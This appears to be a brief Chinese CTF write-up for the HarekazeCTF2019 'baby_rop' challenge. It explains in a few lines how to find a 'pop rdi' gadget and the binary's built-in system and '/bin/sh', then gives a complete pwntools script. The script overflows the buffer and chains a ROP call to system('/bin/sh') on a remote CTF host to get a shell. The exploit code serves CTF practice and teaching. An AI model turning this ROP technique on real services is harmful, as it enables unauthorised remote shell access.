[HarekazeCTF2019]baby_rop WP

发布于 2021-10-22  29 次阅读


一开始想复杂了,没按照预期解,在那边搞glibc版本泄露什么的

实际预期解如下

WP

首先注意到是64位程序

简单分析发现自带system函数和自带“/bin/sh”

system传参需要pop rdi

用ROPgadget工具查一下

脚本如下

脚本

#! python
import os
# os.environ['PWNLIB_NOTERM'] = '1'
from pwn import *
from LibcSearcher import *
context(os = 'linux', log_level="debug")
context.terminal=['konsole','--separate','-e','python']

p32 = lambda a : pwnlib.util.packing.p32(a)
u32 = lambda a : pwnlib.util.packing.u32(a)
p64 = lambda a : pwnlib.util.packing.p64(a)
u64 = lambda a : pwnlib.util.packing.u64(a)

io=remote("node4.buuoj.cn",25217)
# io=process("/home/ksroido/Downloads/babyrop")
#gdb.attach(io,"b *0x40061A")
#pause()
elf = ELF("/home/ksroido/Downloads/babyrop")
#libc = ELF("/home/ksroido/Downloads/libc-2.23.so")
#libc = ELF("/usr/lib32/libc-2.33.so")

# libc_system = libc.symbols['system']
# libc_sh = libc.search(b'/bin/sh').__next__()
# libc_write = libc.symbols['write']

pop_rdi_addr = 0x400683 
main_addr = 0x4005D6
elf_write_plt = elf.plt['printf']
elf_write_got = elf.got['printf']
ret=0x000000000040061A
payload1 =b'A'*16+b'b'*8 + p64(pop_rdi_addr) + p64(0x601048) + p64(0x4005E3)

# payload1 = b'A'*16+b'b'*8+p64(elf_write_plt)+p64(main_addr) \
#            + p64(1) + p64(elf_write_got) + p64(0x8)

io.sendline(payload1)


io.interactive()